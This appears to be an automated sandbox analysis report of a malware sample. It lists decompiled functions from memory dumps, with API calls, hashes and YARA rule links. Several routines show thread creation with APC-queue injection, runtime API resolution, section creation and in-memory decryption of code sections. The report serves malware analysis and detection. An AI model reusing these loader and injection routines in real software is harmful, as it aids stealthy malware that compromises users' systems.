Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 267abf0788035537d79f67ddf98abca827d0e325b81ee9f981615153d9a0935a
Instruction ID: 355e7d0d0a385c1ac6ef142ba0a9a7cceea5ed911441bf28b3c2616182d8d544
Opcode Fuzzy Hash: 267abf0788035537d79f67ddf98abca827d0e325b81ee9f981615153d9a0935a
Instruction Fuzzy Hash: 4211C172A016266BCA2277649C89CAF3E9DBF857607090015F90197182DE64DD069BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C53E710, Relevance: 10.6, APIs: 7, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6C53E714

Part of subcall function 6C5427F1: _setlocale.LIBCMT ref: 6C54280A

_free.LIBCMT ref: 6C53E724

Part of subcall function 6C543F97: HeapFree.KERNEL32(00000000,00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FAB
Part of subcall function 6C543F97: GetLastError.KERNEL32(00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FBD

_free.LIBCMT ref: 6C53E73B
_free.LIBCMT ref: 6C53E752
_free.LIBCMT ref: 6C53E769
_free.LIBCMT ref: 6C53E780
_free.LIBCMT ref: 6C53E797

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: 6f91f8754ef23c16e43dc6d4917a315c775c50e139badb3c96fa59e59bb81cd4
Instruction ID: 87ed361d010c702af45d974c8f4297a791f0413c04180c94fd8c94ab921fac55
Opcode Fuzzy Hash: 6f91f8754ef23c16e43dc6d4917a315c775c50e139badb3c96fa59e59bb81cd4
Instruction Fuzzy Hash: 48011BF0A01B509BFA20CA359C4CB5777E85F10748F008928D85ACBB40F77AF90C8B96

Uniqueness

Uniqueness Score: -1.00%

Function 00501671, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 005016B2
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00501734
StrStrIW.SHLWAPI(00000000,006E0069), ref: 00501773
SysFreeString.OLEAUT32(00000000), ref: 00501795

Part of subcall function 005013B4: SysAllocString.OLEAUT32(005092D0), ref: 00501404

SafeArrayDestroy.OLEAUT32(?), ref: 005017E9
SysFreeString.OLEAUT32(?), ref: 005017F7

Part of subcall function 00505872: Sleep.KERNELBASE(000001F4), ref: 005058BA

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 97fb278d744aeca64675b48333579722b56a4af4f9f3a2bda23b9ccc16005b93
Instruction ID: dc30f8af439be345f2bf14c686d29ec7c576af1c0441263c47f8a62cc0bb56db
Opcode Fuzzy Hash: 97fb278d744aeca64675b48333579722b56a4af4f9f3a2bda23b9ccc16005b93
Instruction Fuzzy Hash: 6D51337690060EEFCB10DFE4C8888AEBBB6FF88350B148868E505EB264D7319D45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6C501AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6C501AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6C501C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6c5041d0 + 0x6c505014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6c5041d0 + 0x6c5050e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6C50136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6c5041d0 + 0x6c5050f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6c5041d0 + 0x6c505104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6c5041d0 + 0x6c505119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6c5041d0 + 0x6c50512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6C5018D1(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6c501ab3
0x6c501ab7
0x6c501b78
0x6c501abd
0x6c501ad5
0x6c501ae4
0x6c501aeb
0x6c501aef
0x6c501af2
0x6c501b70
0x6c501b71
0x6c501af4
0x6c501b01
0x6c501b05
0x6c501b08
0x00000000
0x6c501b0a
0x6c501b17
0x6c501b1b
0x6c501b1e
0x00000000
0x6c501b20
0x6c501b2d
0x6c501b31
0x6c501b34
0x00000000
0x6c501b36
0x6c501b43
0x6c501b47
0x6c501b4a
0x00000000
0x6c501b4c
0x6c501b52
0x6c501b58
0x6c501b5d
0x6c501b64
0x6c501b67
0x00000000
0x6c501b69
0x6c501b6c
0x6c501b6c
0x6c501b67
0x6c501b4a
0x6c501b34
0x6c501b1e
0x6c501b08
0x6c501af2
0x6c501b86

APIs

Part of subcall function 6C501C8F: HeapAlloc.KERNEL32(00000000,?,6C50117D,?,00000000,00000000,?,?,?,6C501810), ref: 6C501C9B

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6C501272,?,?,?,?,00000002,00000000,?,?), ref: 6C501AC9
GetProcAddress.KERNEL32(00000000,?), ref: 6C501AEB
GetProcAddress.KERNEL32(00000000,?), ref: 6C501B01
GetProcAddress.KERNEL32(00000000,?), ref: 6C501B17
GetProcAddress.KERNEL32(00000000,?), ref: 6C501B2D
GetProcAddress.KERNEL32(00000000,?), ref: 6C501B43

Part of subcall function 6C5018D1: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6C50192E
Part of subcall function 6C5018D1: memset.NTDLL ref: 6C501950

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: d265a4c39df785628a3a70925e1ae67521bacf67892b1b8e96dbd518112ff7f3
Instruction ID: e0e4533f5eec5511279204b091700cc32c4e92be91ee0ffc42bd2aabfeee74bf
Opcode Fuzzy Hash: d265a4c39df785628a3a70925e1ae67521bacf67892b1b8e96dbd518112ff7f3
Instruction Fuzzy Hash: 11215CB1701A0ADFDB50EF69CD80E5B7BF8FB19288B01442AE805C7621E730E9158BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6C501E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6c504188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6c50418c;
						if( *0x6c50418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6c504198;
								if( *0x6c504198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6c50418c);
						}
						HeapDestroy( *0x6c504190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6c504188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6c504190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6c5041b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6C501CA4(E6C501D32, E6C501EE0(_a12, 1, 0x6c504198, _t41));
							 *0x6c50418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6c501e07
0x6c501e13
0x6c501e15
0x6c501e18
0x6c501e8e
0x6c501e94
0x6c501e96
0x6c501e98
0x6c501e9e
0x6c501ea0
0x6c501ea5
0x6c501ea8
0x6c501eb3
0x6c501eb5
0x00000000
0x00000000
0x6c501eb7
0x6c501eba
0x6c501ebc
0x00000000
0x00000000
0x00000000
0x6c501ebc
0x6c501ec4
0x6c501ec4
0x6c501ed0
0x6c501ed0
0x6c501e1a
0x6c501e1b
0x6c501e3b
0x6c501e41
0x6c501e43
0x6c501e48
0x6c501e84
0x6c501e84
0x6c501e4a
0x6c501e52
0x6c501e59
0x6c501e63
0x6c501e6f
0x6c501e76
0x6c501e7b
0x6c501e80
0x00000000
0x6c501e80
0x6c501e7b
0x6c501e48
0x6c501e1b
0x6c501edd

APIs

InterlockedIncrement.KERNEL32(6C504188), ref: 6C501E26
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6C501E3B

Part of subcall function 6C501CA4: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6C504198,6C501E74), ref: 6C501CBB
Part of subcall function 6C501CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6C501CD0
Part of subcall function 6C501CA4: GetLastError.KERNEL32(00000000), ref: 6C501CDB
Part of subcall function 6C501CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6C501CE5
Part of subcall function 6C501CA4: CloseHandle.KERNEL32(00000000), ref: 6C501CEC
Part of subcall function 6C501CA4: SetLastError.KERNEL32(00000000), ref: 6C501CF5

InterlockedDecrement.KERNEL32(6C504188), ref: 6C501E8E
SleepEx.KERNEL32(00000064,00000001), ref: 6C501EA8
CloseHandle.KERNEL32 ref: 6C501EC4
HeapDestroy.KERNEL32 ref: 6C501ED0

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: c2c91a2ab509b55536cfabce61f616c569e42b98f9a7cfa4a4968ae061730c5d
Instruction ID: 2858e4d4ba753e63581bf8f3f19757aca12cdbfb5f2c1b55975da0d35d1410ea
Opcode Fuzzy Hash: c2c91a2ab509b55536cfabce61f616c569e42b98f9a7cfa4a4968ae061730c5d
Instruction Fuzzy Hash: 24215C71B01605EBDB009FAACC84A5F7FB8FB6A3AC752452DE509D3A41E730CD049B66

Uniqueness

Uniqueness Score: -1.00%

Function 6C501CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6C501CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6c5041cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6c501cbb
0x6c501cc1
0x6c501cc5
0x6c501cd0
0x6c501cd8
0x6c501ce1
0x6c501ce5
0x6c501cec
0x6c501cf3
0x6c501cf5
0x6c501cfb
0x6c501cd8
0x6c501cff

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,6C504198,6C501E74), ref: 6C501CBB
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6C501CD0
GetLastError.KERNEL32(00000000), ref: 6C501CDB
TerminateThread.KERNEL32(00000000,00000000), ref: 6C501CE5
CloseHandle.KERNEL32(00000000), ref: 6C501CEC
SetLastError.KERNEL32(00000000), ref: 6C501CF5

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: c63471c169195cbe0068b7032502df02cafd94048912852656ab6b7336d71a87
Instruction ID: 42d17019c04e0185f78177e7fccff8a66305ccb83591c8355091107168e02717
Opcode Fuzzy Hash: c63471c169195cbe0068b7032502df02cafd94048912852656ab6b7336d71a87
Instruction Fuzzy Hash: 07F08C32306A21BBDB121BA08C1CF4BBF78FB0A715F02440CFA09D2140D721C8119BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0050344C, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 005034A3
SysAllocString.OLEAUT32(005020DE), ref: 005034E6
SysFreeString.OLEAUT32(00000000), ref: 005034FA
SysFreeString.OLEAUT32(00000000), ref: 00503508

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 3642ec43c406b3b746cb10f9fdbc1a403917b238fcc96d3863a27e8bc386ce01
Instruction ID: 7b300bfd1a6c1785271ffa92b1aece364bcb34f3fd8170d3a2d40451acce4067
Opcode Fuzzy Hash: 3642ec43c406b3b746cb10f9fdbc1a403917b238fcc96d3863a27e8bc386ce01
Instruction Fuzzy Hash: 91313B7190010AEFCB05CF98D8C88AE7FB9FF58300B20846EF5069B260E7359A45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6C5015A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6C5015A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6c5041b0;
				_t39 = E6C501A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6c5041cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6c505137; // 0x6c505137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6C501D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6c5041cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x6c5015aa
0x6c5015ba
0x6c5015c1
0x6c5015c4
0x6c5015d9
0x6c5015e0
0x6c5015e5
0x6c5015f6
0x6c5015f9
0x6c501601
0x6c501604
0x6c5016ae
0x6c50160a
0x6c50160a
0x6c50160e
0x6c501676
0x6c501610
0x6c501610
0x6c501613
0x6c501615
0x6c50161d
0x6c501620
0x6c501623
0x6c50162b
0x6c501633
0x6c501634
0x6c501635
0x6c50163c
0x6c50163c
0x6c501650
0x6c501655
0x6c50165e
0x6c501665
0x6c501668
0x6c50166c
0x6c501671
0x00000000
0x00000000
0x6c501628
0x6c501628
0x6c501673
0x6c501680
0x6c501695
0x6c501682
0x6c50168b
0x6c501690
0x6c5016a6
0x6c5016a6
0x6c5016b5
0x6c5016bb

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6C5015F9
memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6C5017EC), ref: 6C50168B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6C5016A6

Strings

Mar 26 2021, xrefs: 6C50162B

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 26 2021
API String ID: 4010158826-2175073649
Opcode ID: 1fbbca5dd586482102da28e4a19539ef90f7fe4a778e20a74840a775ed99f38e
Instruction ID: f08028e7eadcd4d423b96cc99367c03b922467bc2891bd9afdd4e058efd51776
Opcode Fuzzy Hash: 1fbbca5dd586482102da28e4a19539ef90f7fe4a778e20a74840a775ed99f38e
Instruction Fuzzy Hash: D6315E71F00609ABDF00CF99CD81ADEBBB9FF49308F148129E905EB641D771AA058F95

Uniqueness

Uniqueness Score: -1.00%

Function 00505988, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00505988(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00505C4E(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00505994
0x00505998
0x00505999
0x0050599a
0x0050599c
0x0050599e
0x005059a3
0x005059a6
0x00505a3d
0x00505a44
0x00505a44
0x005059af
0x005059b6
0x005059c6
0x005059c6
0x005059cc
0x005059ce
0x005059d3
0x005059dc
0x005059e4
0x005059e7
0x005059f2
0x005059f6
0x005059f8
0x005059f9
0x00505a02
0x00505a06
0x00505a17
0x00505a08
0x00505a0d
0x00505a12
0x00505a21
0x00505a21
0x005059f6
0x00505a27
0x00505a2d
0x00505a2d
0x00505a36
0x00505a3b
0x00505a3b
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 005059B6
lstrlenW.KERNEL32(?), ref: 005059EC
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00505A0D
SysFreeString.OLEAUT32(?), ref: 00505A21

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: c6b7e4b2f74d645869c2144c2eba64597b9529b7cfeb43f6cf6d79d1b18f0a7e
Instruction ID: 667b6fc46415f82530db9fd7f574653adab5cf33bfbe0f98ad03aeaacfab5979
Opcode Fuzzy Hash: c6b7e4b2f74d645869c2144c2eba64597b9529b7cfeb43f6cf6d79d1b18f0a7e
Instruction Fuzzy Hash: 75213D75A0060AEFCB11DFA8C88899EBFB8FF48345F1442A9E945E7254F7309A45DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C501D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6C501D32(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6C5017A7(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6c501d3b
0x6c501d40
0x6c501d4e
0x6c501d53
0x6c501d53
0x6c501d59
0x6c501d5e
0x6c501d62
0x6c501d66
0x6c501d66
0x6c501d70
0x6c501d79

APIs

GetCurrentThread.KERNEL32 ref: 6C501D35
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6C501D40
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6C501D53
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6C501D66

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 2055e3f5b47fd1f18b8167ba0cc5944b6f8d8e7131ebaa5fe3c8a0939a13e2b4
Instruction ID: 6bcb24f426fea93d02a52b15d183422dd7807eab43a50587a9c863a1ccf1d497
Opcode Fuzzy Hash: 2055e3f5b47fd1f18b8167ba0cc5944b6f8d8e7131ebaa5fe3c8a0939a13e2b4
Instruction Fuzzy Hash: 7AE092313067106BD7022A294C88EAB7BACDFD333A7120339F524D32D0DB54CC09D6AA

Uniqueness

Uniqueness Score: -1.00%

Function 00507471, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00507471(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E0050344C(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x50a2d0; // 0x2add5a8
						_t20 = _t68 + 0x50b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00502986(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00507477
0x0050747a
0x0050748a
0x00507493
0x00507497
0x00507565
0x0050756b
0x0050756b
0x005074b1
0x005074b6
0x005074ba
0x005074c0
0x005074c5
0x005074cc
0x005074db
0x005074db
0x005074df
0x005074e1
0x005074ed
0x005074f8
0x00507503
0x00507507
0x00507511
0x00507515
0x00507517
0x0050751c
0x00507523
0x00507533
0x00507533
0x0050751c
0x00507515
0x00507535
0x0050753a
0x0050753f
0x0050753f
0x00507545
0x0050754b
0x00507550
0x00507550
0x00507555
0x0050755a
0x0050755a
0x00507555
0x005074df
0x0050755c
0x00507562
0x00000000

APIs

Part of subcall function 0050344C: SysAllocString.OLEAUT32(80000002), ref: 005034A3
Part of subcall function 0050344C: SysFreeString.OLEAUT32(00000000), ref: 00503508

SysFreeString.OLEAUT32(?), ref: 00507550
SysFreeString.OLEAUT32(005020DE), ref: 0050755A

Strings

-tP, xrefs: 0050747D

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

